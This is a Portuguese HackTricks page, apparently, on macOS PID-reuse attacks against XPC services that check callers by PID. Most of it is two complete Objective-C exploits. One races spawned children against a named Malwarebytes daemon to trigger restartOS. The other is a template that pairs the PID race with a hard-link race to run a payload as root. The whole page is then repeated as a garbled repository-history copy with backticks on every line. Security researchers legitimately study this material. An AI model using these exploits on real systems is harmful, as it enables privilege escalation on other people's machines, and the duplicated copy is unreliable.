hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md

# macOS PID Reuse

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</details>
{% endhint %}

## PID Reuse

Quando um **serviço XPC** do macOS está verificando o processo chamado com base no **PID** e não no **token de auditoria**, ele é vulnerável a um ataque de reutilização de PID. Este ataque é baseado em uma **condição de corrida** onde um **exploit** vai **enviar mensagens para o serviço XPC** **abusando** da funcionalidade e logo **após** isso, executando **`posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ)`** com o binário **permitido**.

Esta função fará com que o **binário permitido possua o PID**, mas a **mensagem XPC maliciosa teria sido enviada** logo antes. Assim, se o serviço **XPC** **usar** o **PID** para **autenticar** o remetente e verificá-lo **APÓS** a execução de **`posix_spawn`**, ele pensará que vem de um processo **autorizado**.

### Exemplo de Exploit

Se você encontrar a função **`shouldAcceptNewConnection`** ou uma função chamada por ela **chamando** **`processIdentifier`** e não chamando **`auditToken`**. Isso provavelmente significa que está **verificando o PID do processo** e não o token de auditoria.\
Como por exemplo nesta imagem (retirada da referência):

<figure><img src="../../../../../../.gitbook/assets/image (306).png" alt="https://wojciechregula.blog/images/2020/04/pid.png"><figcaption></figcaption></figure>

Verifique este exemplo de exploit (novamente, retirado da referência) para ver as 2 partes do exploit:

* Uma que **gera vários forks**
* **Cada fork** irá **enviar** o **payload** para o serviço XPC enquanto executa **`posix_spawn`** logo após enviar a mensagem.

{% hint style="danger" %}
Para que o exploit funcione, é importante ` export`` `` `**`OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES`** ou colocar dentro do exploit:
```objectivec
asm(".section __DATA,__objc_fork_ok\n"
"empty:\n"
".no_dead_strip empty\n");
```
{% endhint %}

{% tabs %}
{% tab title="NSTasks" %}
Primeira opção usando **`NSTasks`** e argumento para iniciar os filhos para explorar o RC
```objectivec
// Code from https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/
// gcc -framework Foundation expl.m -o expl

#import <Foundation/Foundation.h>
#include <spawn.h>
#include <sys/stat.h>

#define RACE_COUNT 32
#define MACH_SERVICE @"com.malwarebytes.mbam.rtprotection.daemon"
#define BINARY "/Library/Application Support/Malwarebytes/MBAM/Engine.bundle/Contents/PlugIns/RTProtectionDaemon.app/Contents/MacOS/RTProtectionDaemon"

// allow fork() between exec()
asm(".section __DATA,__objc_fork_ok\n"
"empty:\n"
".no_dead_strip empty\n");

extern char **environ;

// defining necessary protocols
@protocol ProtectionService
- (void)startDatabaseUpdate;
- (void)restoreApplicationLauncherWithCompletion:(void (^)(BOOL))arg1;
- (void)uninstallProduct;
- (void)installProductUpdate;
- (void)startProductUpdateWith:(NSUUID *)arg1 forceInstall:(BOOL)arg2;
- (void)buildPurchaseSiteURLWithCompletion:(void (^)(long long, NSString *))arg1;
- (void)triggerLicenseRelatedChecks;
- (void)buildRenewalLinkWith:(NSUUID *)arg1 completion:(void (^)(long long, NSString *))arg2;
- (void)cancelTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;
- (void)startTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;
- (void)unredeemLicenseKeyWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;
- (void)applyLicenseWith:(NSUUID *)arg1 key:(NSString *)arg2 completion:(void (^)(long long))arg3;
- (void)controlProtectionWithRawFeatures:(long long)arg1 rawOperation:(long long)arg2;
- (void)restartOS;
- (void)resumeScanJob;
- (void)pauseScanJob;
- (void)stopScanJob;
- (void)startScanJob;
- (void)disposeOperationBy:(NSUUID *)arg1;
- (void)subscribeTo:(long long)arg1;
- (void)pingWithTag:(NSUUID *)arg1 completion:(void (^)(NSUUID *, long long))arg2;
@end

void child() {

// send the XPC messages
NSXPCInterface *remoteInterface = [NSXPCInterface interfaceWithProtocol:@protocol(ProtectionService)];
NSXPCConnection *xpcConnection = [[NSXPCConnection alloc] initWithMachServiceName:MACH_SERVICE options:NSXPCConnectionPrivileged];
xpcConnection.remoteObjectInterface = remoteInterface;

[xpcConnection resume];
[xpcConnection.remoteObjectProxy restartOS];

char target_binary[] = BINARY;
char *target_argv[] = {target_binary, NULL};
posix_spawnattr_t attr;
posix_spawnattr_init(&attr);
short flags;
posix_spawnattr_getflags(&attr, &flags);
flags |= (POSIX_SPAWN_SETEXEC | POSIX_SPAWN_START_SUSPENDED);
posix_spawnattr_setflags(&attr, flags);
posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ);
}

bool create_nstasks() {

NSString *exec = [[NSBundle mainBundle] executablePath];
NSTask *processes[RACE_COUNT];

for (int i = 0; i < RACE_COUNT; i++) {
processes[i] = [NSTask launchedTaskWithLaunchPath:exec arguments:@[ @"imanstask" ]];
}

int i = 0;
struct timespec ts = {
.tv_sec = 0,
.tv_nsec = 500 * 1000000,
};

nanosleep(&ts, NULL);
if (++i > 4) {
for (int i = 0; i < RACE_COUNT; i++) {
[processes[i] terminate];
}
return false;
}

return true;
}

int main(int argc, const char * argv[]) {

if(argc > 1) {
// called from the NSTasks
child();

} else {
NSLog(@"Starting the race");
create_nstasks();
}

return 0;
}
```
{% endtab %}

{% tab title="fork" %}
Este exemplo usa um **`fork`** bruto para lançar **filhos que explorarão a condição de corrida de PID** e, em seguida, explorar **outra condição de corrida via um link físico:**
```objectivec
// export OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES
// gcc -framework Foundation expl.m -o expl

#include <Foundation/Foundation.h>
#include <spawn.h>
#include <pthread.h>

// TODO: CHANGE PROTOCOL AND FUNCTIONS
@protocol HelperProtocol
- (void)DoSomething:(void (^)(_Bool))arg1;
@end

// Global flag to track exploitation status
bool pwned = false;

/**
* Continuously overwrite the contents of the 'hard_link' file in a race condition to make the
* XPC service verify the legit binary and then execute as root out payload.
*/
void *check_race(void *arg) {
while(!pwned) {
// Overwrite with contents of the legit binary
system("cat ./legit_bin > hard_link");
usleep(50000);

// Overwrite with contents of the payload to execute
// TODO: COMPILE YOUR OWN PAYLOAD BIN
system("cat ./payload > hard_link");
usleep(50000);
}
return NULL;
}

void child_xpc_pid_rc_abuse(){
// TODO: INDICATE A VALID BIN TO BYPASS SIGN VERIFICATION
#define kValid "./Legit Updater.app/Contents/MacOS/Legit"
extern char **environ;

// Connect with XPC service
// TODO: CHANGE THE ID OF THE XPC TO EXPLOIT
NSString*  service_name = @"com.example.Helper";
NSXPCConnection* connection = [[NSXPCConnection alloc] initWithMachServiceName:service_name options:0x1000];
// TODO: CNAGE THE PROTOCOL NAME
NSXPCInterface* interface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperProtocol)];
[connection setRemoteObjectInterface:interface];
[connection resume];

id obj = [connection remoteObjectProxyWithErrorHandler:^(NSError* error) {
NSLog(@"[-] Something went wrong");
NSLog(@"[-] Error: %@", error);
}];

NSLog(@"obj: %@", obj);
NSLog(@"conn: %@", connection);

// Call vulenrable XPC function
// TODO: CHANEG NAME OF FUNCTION TO CALL
[obj DoSomething:^(_Bool b){
NSLog(@"Response, %hdd", b);
}];

// Change current process to the legit binary suspended
char target_binary[] = kValid;
char *target_argv[] = {target_binary, NULL};
posix_spawnattr_t attr;
posix_spawnattr_init(&attr);
short flags;
posix_spawnattr_getflags(&attr, &flags);
flags |= (POSIX_SPAWN_SETEXEC | POSIX_SPAWN_START_SUSPENDED);
posix_spawnattr_setflags(&attr, flags);
posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ);
}

/**
* Function to perform the PID race condition using children calling the XPC exploit.
*/
void xpc_pid_rc_abuse() {
#define RACE_COUNT 1
extern char **environ;
int pids[RACE_COUNT];

// Fork child processes to exploit
for (int i = 0; i < RACE_COUNT; i++) {
int pid = fork();
if (pid == 0) {  // If a child process
child_xpc_pid_rc_abuse();
}
printf("forked %d\n", pid);
pids[i] = pid;
}

// Wait for children to finish their tasks
sleep(3);

// Terminate child processes
for (int i = 0; i < RACE_COUNT; i++) {
if (pids[i]) {
kill(pids[i], 9);
}
}
}

int main(int argc, const char * argv[]) {
// Create and set execution rights to 'hard_link' file
system("touch hard_link");
system("chmod +x hard_link");

// Create thread to exploit sign verification RC
pthread_t thread;
pthread_create(&thread, NULL, check_race, NULL);

while(!pwned) {
// Try creating 'download' directory, ignore errors
system("mkdir download 2>/dev/null");

// Create a hardlink
// TODO: CHANGE NAME OF FILE FOR SIGN VERIF RC
system("ln hard_link download/legit_bin");

xpc_pid_rc_abuse();
usleep(10000);

// The payload will generate this file if exploitation is successfull
if (access("/tmp/pwned", F_OK ) == 0) {
pwned = true;
}
}

return 0;
}
```
{% endtab %}
{% endtabs %}

## Outros exemplos

* [https://gergelykalman.com/why-you-shouldnt-use-a-commercial-vpn-amateur-hour-with-windscribe.html](https://gergelykalman.com/why-you-shouldnt-use-a-commercial-vpn-amateur-hour-with-windscribe.html)

## Referências

* [https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/](https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/)
* [https://saelo.github.io/presentations/warcon18\_dont\_trust\_the\_pid.pdf](https://saelo.github.io/presentations/warcon18\_dont\_trust\_the\_pid.pdf)

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</details>
{% endhint %}
Recreating repository history for branch pt 2024-12-12 12:56:11 +00:00			`# macOS PID Reuse`

			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`

			`<details>`

			`<summary>Support HackTricks</summary>`

			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`

			`</details>`
			`{% endhint %}`

			`## PID Reuse`

			Quando um serviço XPC do macOS está verificando o processo chamado com base no PID e não no token de auditoria, ele é vulnerável a um ataque de reutilização de PID. Este ataque é baseado em uma condição de corrida onde um exploit vai enviar mensagens para o serviço XPC abusando da funcionalidade e logo após isso, executando `posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ)` com o binário permitido.

			Esta função fará com que o binário permitido possua o PID, mas a mensagem XPC maliciosa teria sido enviada logo antes. Assim, se o serviço XPC usar o PID para autenticar o remetente e verificá-lo APÓS a execução de `posix_spawn`, ele pensará que vem de um processo autorizado.

			`### Exemplo de Exploit`

			Se você encontrar a função `shouldAcceptNewConnection` ou uma função chamada por ela chamando `processIdentifier` e não chamando `auditToken`. Isso provavelmente significa que está verificando o PID do processo e não o token de auditoria.\
			`Como por exemplo nesta imagem (retirada da referência):`

			`<figure><img src="../../../../../../.gitbook/assets/image (306).png" alt="https://wojciechregula.blog/images/2020/04/pid.png"><figcaption></figcaption></figure>`

			`Verifique este exemplo de exploit (novamente, retirado da referência) para ver as 2 partes do exploit:`

			`* Uma que gera vários forks`
			* Cada fork irá enviar o payload para o serviço XPC enquanto executa `posix_spawn` logo após enviar a mensagem.

			`{% hint style="danger" %}`
			Para que o exploit funcione, é importante ` export`` `` ``OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES` ou colocar dentro do exploit:
			```objectivec
			`asm(".section __DATA,__objc_fork_ok\n"`
			`"empty:\n"`
			`".no_dead_strip empty\n");`
			```
			`{% endhint %}`

			`{% tabs %}`
			`{% tab title="NSTasks" %}`
			Primeira opção usando `NSTasks` e argumento para iniciar os filhos para explorar o RC
			```objectivec
			`// Code from https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/`
			`// gcc -framework Foundation expl.m -o expl`

			`#import <Foundation/Foundation.h>`
			`#include <spawn.h>`
			`#include <sys/stat.h>`

			`#define RACE_COUNT 32`
			`#define MACH_SERVICE @"com.malwarebytes.mbam.rtprotection.daemon"`
			`#define BINARY "/Library/Application Support/Malwarebytes/MBAM/Engine.bundle/Contents/PlugIns/RTProtectionDaemon.app/Contents/MacOS/RTProtectionDaemon"`

			`// allow fork() between exec()`
			`asm(".section __DATA,__objc_fork_ok\n"`
			`"empty:\n"`
			`".no_dead_strip empty\n");`

			`extern char **environ;`

			`// defining necessary protocols`
			`@protocol ProtectionService`
			`- (void)startDatabaseUpdate;`
			`- (void)restoreApplicationLauncherWithCompletion:(void (^)(BOOL))arg1;`
			`- (void)uninstallProduct;`
			`- (void)installProductUpdate;`
			`- (void)startProductUpdateWith:(NSUUID *)arg1 forceInstall:(BOOL)arg2;`
			`- (void)buildPurchaseSiteURLWithCompletion:(void (^)(long long, NSString *))arg1;`
			`- (void)triggerLicenseRelatedChecks;`
			`- (void)buildRenewalLinkWith:(NSUUID )arg1 completion:(void (^)(long long, NSString ))arg2;`
			`- (void)cancelTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;`
			`- (void)startTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;`
			`- (void)unredeemLicenseKeyWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;`
			`- (void)applyLicenseWith:(NSUUID )arg1 key:(NSString )arg2 completion:(void (^)(long long))arg3;`
			`- (void)controlProtectionWithRawFeatures:(long long)arg1 rawOperation:(long long)arg2;`
			`- (void)restartOS;`
			`- (void)resumeScanJob;`
			`- (void)pauseScanJob;`
			`- (void)stopScanJob;`
			`- (void)startScanJob;`
			`- (void)disposeOperationBy:(NSUUID *)arg1;`
			`- (void)subscribeTo:(long long)arg1;`
			`- (void)pingWithTag:(NSUUID )arg1 completion:(void (^)(NSUUID , long long))arg2;`
			`@end`

			`void child() {`

			`// send the XPC messages`
			`NSXPCInterface *remoteInterface = [NSXPCInterface interfaceWithProtocol:@protocol(ProtectionService)];`
			`NSXPCConnection *xpcConnection = [[NSXPCConnection alloc] initWithMachServiceName:MACH_SERVICE options:NSXPCConnectionPrivileged];`
			`xpcConnection.remoteObjectInterface = remoteInterface;`

			`[xpcConnection resume];`
			`[xpcConnection.remoteObjectProxy restartOS];`

			`char target_binary[] = BINARY;`
			`char *target_argv[] = {target_binary, NULL};`
			`posix_spawnattr_t attr;`
			`posix_spawnattr_init(&attr);`
			`short flags;`
			`posix_spawnattr_getflags(&attr, &flags);`
			`flags \|= (POSIX_SPAWN_SETEXEC \| POSIX_SPAWN_START_SUSPENDED);`
			`posix_spawnattr_setflags(&attr, flags);`
			`posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ);`
			`}`

			`bool create_nstasks() {`

			`NSString *exec = [[NSBundle mainBundle] executablePath];`
			`NSTask *processes[RACE_COUNT];`

			`for (int i = 0; i < RACE_COUNT; i++) {`
			`processes[i] = [NSTask launchedTaskWithLaunchPath:exec arguments:@[ @"imanstask" ]];`
			`}`

			`int i = 0;`
			`struct timespec ts = {`
			`.tv_sec = 0,`
			`.tv_nsec = 500 * 1000000,`
			`};`

			`nanosleep(&ts, NULL);`
			`if (++i > 4) {`
			`for (int i = 0; i < RACE_COUNT; i++) {`
			`[processes[i] terminate];`
			`}`
			`return false;`
			`}`

			`return true;`
			`}`

			`int main(int argc, const char * argv[]) {`

			`if(argc > 1) {`
			`// called from the NSTasks`
			`child();`

			`} else {`
			`NSLog(@"Starting the race");`
			`create_nstasks();`
			`}`

			`return 0;`
			`}`
			```
			`{% endtab %}`

			`{% tab title="fork" %}`
			Este exemplo usa um `fork` bruto para lançar filhos que explorarão a condição de corrida de PID e, em seguida, explorar outra condição de corrida via um link físico:
			```objectivec
			`// export OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES`
			`// gcc -framework Foundation expl.m -o expl`

			`#include <Foundation/Foundation.h>`
			`#include <spawn.h>`
			`#include <pthread.h>`

			`// TODO: CHANGE PROTOCOL AND FUNCTIONS`
			`@protocol HelperProtocol`
			`- (void)DoSomething:(void (^)(_Bool))arg1;`
			`@end`

			`// Global flag to track exploitation status`
			`bool pwned = false;`

			`/**`
			`* Continuously overwrite the contents of the 'hard_link' file in a race condition to make the`
			`* XPC service verify the legit binary and then execute as root out payload.`
			`*/`
			`void check_race(void arg) {`
			`while(!pwned) {`
			`// Overwrite with contents of the legit binary`
			`system("cat ./legit_bin > hard_link");`
			`usleep(50000);`

			`// Overwrite with contents of the payload to execute`
			`// TODO: COMPILE YOUR OWN PAYLOAD BIN`
			`system("cat ./payload > hard_link");`
			`usleep(50000);`
			`}`
			`return NULL;`
			`}`

			`void child_xpc_pid_rc_abuse(){`
			`// TODO: INDICATE A VALID BIN TO BYPASS SIGN VERIFICATION`
			`#define kValid "./Legit Updater.app/Contents/MacOS/Legit"`
			`extern char **environ;`

			`// Connect with XPC service`
			`// TODO: CHANGE THE ID OF THE XPC TO EXPLOIT`
			`NSString* service_name = @"com.example.Helper";`
			`NSXPCConnection* connection = [[NSXPCConnection alloc] initWithMachServiceName:service_name options:0x1000];`
			`// TODO: CNAGE THE PROTOCOL NAME`
			`NSXPCInterface* interface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperProtocol)];`
			`[connection setRemoteObjectInterface:interface];`
			`[connection resume];`

			`id obj = [connection remoteObjectProxyWithErrorHandler:^(NSError* error) {`
			`NSLog(@"[-] Something went wrong");`
			`NSLog(@"[-] Error: %@", error);`
			`}];`

			`NSLog(@"obj: %@", obj);`
			`NSLog(@"conn: %@", connection);`

			`// Call vulenrable XPC function`
			`// TODO: CHANEG NAME OF FUNCTION TO CALL`
			`[obj DoSomething:^(_Bool b){`
			`NSLog(@"Response, %hdd", b);`
			`}];`

			`// Change current process to the legit binary suspended`
			`char target_binary[] = kValid;`
			`char *target_argv[] = {target_binary, NULL};`
			`posix_spawnattr_t attr;`
			`posix_spawnattr_init(&attr);`
			`short flags;`
			`posix_spawnattr_getflags(&attr, &flags);`
			`flags \|= (POSIX_SPAWN_SETEXEC \| POSIX_SPAWN_START_SUSPENDED);`
			`posix_spawnattr_setflags(&attr, flags);`
			`posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ);`
			`}`

			`/**`
			`* Function to perform the PID race condition using children calling the XPC exploit.`
			`*/`
			`void xpc_pid_rc_abuse() {`
			`#define RACE_COUNT 1`
			`extern char **environ;`
			`int pids[RACE_COUNT];`

			`// Fork child processes to exploit`
			`for (int i = 0; i < RACE_COUNT; i++) {`
			`int pid = fork();`
			`if (pid == 0) { // If a child process`
			`child_xpc_pid_rc_abuse();`
			`}`
			`printf("forked %d\n", pid);`
			`pids[i] = pid;`
			`}`

			`// Wait for children to finish their tasks`
			`sleep(3);`

			`// Terminate child processes`
			`for (int i = 0; i < RACE_COUNT; i++) {`
			`if (pids[i]) {`
			`kill(pids[i], 9);`
			`}`
			`}`
			`}`

			`int main(int argc, const char * argv[]) {`
			`// Create and set execution rights to 'hard_link' file`
			`system("touch hard_link");`
			`system("chmod +x hard_link");`

			`// Create thread to exploit sign verification RC`
			`pthread_t thread;`
			`pthread_create(&thread, NULL, check_race, NULL);`

			`while(!pwned) {`
			`// Try creating 'download' directory, ignore errors`
			`system("mkdir download 2>/dev/null");`

			`// Create a hardlink`
			`// TODO: CHANGE NAME OF FILE FOR SIGN VERIF RC`
			`system("ln hard_link download/legit_bin");`

			`xpc_pid_rc_abuse();`
			`usleep(10000);`

			`// The payload will generate this file if exploitation is successfull`
			`if (access("/tmp/pwned", F_OK ) == 0) {`
			`pwned = true;`
			`}`
			`}`

			`return 0;`
			`}`
			```
			`{% endtab %}`
			`{% endtabs %}`

			`## Outros exemplos`

			`* [https://gergelykalman.com/why-you-shouldnt-use-a-commercial-vpn-amateur-hour-with-windscribe.html](https://gergelykalman.com/why-you-shouldnt-use-a-commercial-vpn-amateur-hour-with-windscribe.html)`

			`## Referências`

			`* [https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/](https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/)`
			`* [https://saelo.github.io/presentations/warcon18\_dont\_trust\_the\_pid.pdf](https://saelo.github.io/presentations/warcon18\_dont\_trust\_the\_pid.pdf)`

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			`Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`

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